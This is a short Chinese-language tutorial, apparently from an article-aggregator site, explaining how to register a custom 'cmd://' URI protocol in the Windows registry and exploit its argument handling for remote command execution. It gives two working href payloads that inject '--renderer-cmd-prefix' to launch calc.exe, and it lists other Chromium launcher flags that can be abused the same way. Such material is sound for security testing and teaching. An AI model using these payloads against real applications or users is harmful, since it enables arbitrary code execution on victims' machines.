URI Scheme注册伪协议实现远程命令执行
Windows配置注册表注册伪协议
一、新建伪协议项
WIN+R 输入regedit 打开注册表,在注册表HKEY_CLASSES_ROOT键中新建一个项,项的名字就是你伪协议的名字,例如我注册一个cmd协议。
而后不用管默认字符串值,新建一个叫URL Procotol的字符串值,值为空便可。
shell
二、新建shell项
在cmd协议项中新建一个项 , 叫作shell,这个名称不能改。默认字符串值为空
windows
三、新建open项
在shell项中新建一个项 , 叫作open,这个名称不能改。默认字符串值为空
api
四、新建command项
在open项中新建一个项 , 叫作command,这个名称不能改。默认字符串值为可执行文件路径和参数等
安全
远程命令执行漏洞
根据这个地方的参数引号闭合状况去构造payload,相似SQL注入测试
- 是%1 则payload:href='cmd://123 --renderer-cmd-prefix="cmd.exe /c start calc.exe" '
- 要是“%1”则payload:href='cmd://123" --renderer-cmd-prefix="cmd.exe /c start calc.exe '
效果(备注这里须要使用IE内核测试):
其余引发RCE的参数以下:
- --renderer-cmd-prefix
- --gpu-launcher
- --utility-cmd-prefix
- --ppapi-plugin-launcher
- --nacl-gdb
- --ppapi-flash-path
- --ppapi-flash-args
参考文献:
相关文章
- 1. ctf.show web3 文件包含+php伪协议+命令执行
- 2. ssh远程执行命令
- 3. zabbix执行远程命令
- 4. WordPress远程命令执行
- 5. powershel远程执行命令
- 6. Tomcat远程命令执行
- 7. SSH 远程执行命令
- 8. zabbix--远程执行命令
- 9. Zabbix远程执行命令
- 10. linux远程执行命令
- 更多相关文章...
- • Rust 输出到命令行 - RUST 教程
- • Swift 协议 - Swift 教程
- • Spring Cloud 微服务实战(三) - 服务注册与发现
- • Docker 清理命令
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
欢迎关注本站公众号,获取更多信息
相关文章
- 1. ctf.show web3 文件包含+php伪协议+命令执行
- 2. ssh远程执行命令
- 3. zabbix执行远程命令
- 4. WordPress远程命令执行
- 5. powershel远程执行命令
- 6. Tomcat远程命令执行
- 7. SSH 远程执行命令
- 8. zabbix--远程执行命令
- 9. Zabbix远程执行命令
- 10. linux远程执行命令